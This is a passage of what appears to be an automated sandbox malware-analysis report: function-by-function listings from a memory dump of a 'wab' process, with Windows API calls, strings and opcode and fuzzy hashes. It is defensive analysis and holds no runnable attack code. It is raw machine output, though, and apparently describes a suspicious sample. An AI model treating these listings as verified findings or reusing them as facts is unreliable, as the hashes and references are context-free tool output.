                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1161345128-0
                                                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 159017214-0
                                                                                                                                                                                                          • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B0B5 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                          • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                                          • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1481295809-0
                                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
